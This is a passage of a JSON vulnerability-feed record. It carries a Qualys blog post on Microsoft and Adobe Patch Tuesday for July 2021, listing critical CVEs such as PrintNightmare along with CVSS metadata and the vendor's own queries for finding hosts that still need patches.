"Assess Your Risk From Ransomware Attacks, Powered by Qualys Research", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1723", "CVE-2013-0431", "CVE-2013-1493", "CVE-2018-12808", "CVE-2019-1458", "CVE-2020-1472", "CVE-2021-34527"], "modified": "2021-10-05T12:50:00", "id": "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:25", "description": "### Microsoft Patch Tuesday \u2013 July 2021\n\nMicrosoft patched 117 vulnerabilities in their July 2021 Patch Tuesday release, and 13 of them are rated as critical severity.\n\n### Critical Microsoft Vulnerabilities Patched\n\n[CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>) \u2013 Scripting Engine Memory Corruption Vulnerability\n\nThis is being actively exploited. The vulnerability allows an attacker who controls a compromised website to execute malicious code if a user browses to a specially crafted file on that website. The vendor has assigned a CVSSv3 base score of 6.8, and it should be prioritized for patching.\n\n[CVE-2021-34494](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34494>) \u2013 Windows DNS Server Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE vulnerability in Windows DNS Server (CVE-2021-34494). This CVE has a high likelihood of exploitability and is assigned a CVSSv3 base score of 8.8 by the vendor. 
This is only exploitable on DNS servers; however, it could allow remote code execution without user interaction.\n\n[CVE-2021-33780](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33780>) - Windows DNS Server Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE vulnerability in DNS Server (CVE-2021-33780). This CVE has a high likelihood of exploitability and is assigned a CVSSv3 base score of 8.8 by the vendor.\n\n[CVE-2021-31979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31979>) - Windows Kernel Elevation of Privilege Vulnerability\n\nThis has been actively exploited and is assigned a CVSSv3 base score of 7.2 by the vendor. It should be prioritized for patching.\n\n[CVE-2021-34489](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34489>) \u2013 DirectWrite Remote Code Execution Vulnerability\n\nThe vulnerability allows an attacker to host a website that contains a specially crafted file designed to exploit the vulnerability. The vendor has assigned a CVSSv3 base score of 7.8, and it should be prioritized for patching.\n\n**CVE-2021-34467, CVE-2021-34468** \u2013 Microsoft SharePoint Server Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing critical RCE vulnerabilities in SharePoint Server (CVE-2021-34467, CVE-2021-34468). These CVEs have a high likelihood of exploitability and are assigned a CVSSv3 base score of 7.1 by the vendor. Along with these patches, CVE-2021-34520 should be prioritized for patching.\n\n[CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) \u2013 Windows Print Spooler Remote Code Execution Vulnerability\n\nThis Patch Tuesday follows out-of-band updates released to fix the Windows Print Spooler remote code execution vulnerability, popularly known as PrintNightmare. 
While Microsoft has released updates to fix the PrintNightmare vulnerability, it is important to ensure the necessary configurations are set correctly. We also published a blog post on [how to remediate PrintNightmare using Qualys VMDR](<https://blog.qualys.com/vulnerabilities-threat-research/2021/07/07/microsoft-windows-print-spooler-rce-vulnerability-printnightmare-cve-2021-34527-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>).\n\n### Adobe Patch Tuesday \u2013 July 2021\n\nAdobe addressed 26 CVEs this Patch Tuesday, and 22 of them are rated as critical severity, impacting Acrobat and Reader, Adobe Framemaker, Illustrator, Dimension, and Adobe Bridge products.\n\n### Discover Patch Tuesday Vulnerabilities in VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all your hosts impacted by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:(qid:50112 OR qid:50113 OR qid:91787 OR qid:91788 OR qid:91789 OR qid:91790 OR qid:91791 OR qid:91792 OR qid:91793 OR qid:91794 OR qid:91795 OR qid:110386 OR qid:110387 OR qid:375700 OR qid:375706 OR qid:375707 OR qid:375708 OR qid:375713 OR qid:375714 OR qid:375715)`\n\n### Respond by Patching\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. 
You can simply select the respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday:\n\n`(qid:50112 OR qid:50113 OR qid:91787 OR qid:91788 OR qid:91789 OR qid:91790 OR qid:91791 OR qid:91792 OR qid:91793 OR qid:91794 OR qid:91795 OR qid:110386 OR qid:110387 OR qid:375700 OR qid:375706 OR qid:375707 OR qid:375708 OR qid:375713 OR qid:375714 OR qid:375715)`\n\n### Patch Tuesday Dashboard\n\nThe current Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://success.qualys.com/discussions/s/article/000006505>).\n\n### Webinar Series: This Month in Vulnerabilities and Patches\n\nTo help customers leverage the integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series, [_This Month in Vulnerabilities and Patches_](<https://www.brighttalk.com/webcast/11673/494962>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * Windows Print Spooler RCE Vulnerability\n * Kaseya Multiple Zero-Day Vulnerabilities\n * SonicWall Buffer Overflow Vulnerability\n * Microsoft Patch Tuesday, July 2021\n * Adobe Patch Tuesday, July 2021\n\n[Join us live or watch on demand!](<https://www.brighttalk.com/webcast/11673/494962>)\n\nWebinar July 15, 2021 or on demand.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://success.qualys.com/discussions/s/article/000006505>).", 
"cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T19:49:37", "type": "qualysblog", "title": "Microsoft and Adobe Patch Tuesday (July 2021) \u2013 Microsoft 117 Vulnerabilities with 13 Critical, Adobe 26 Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false,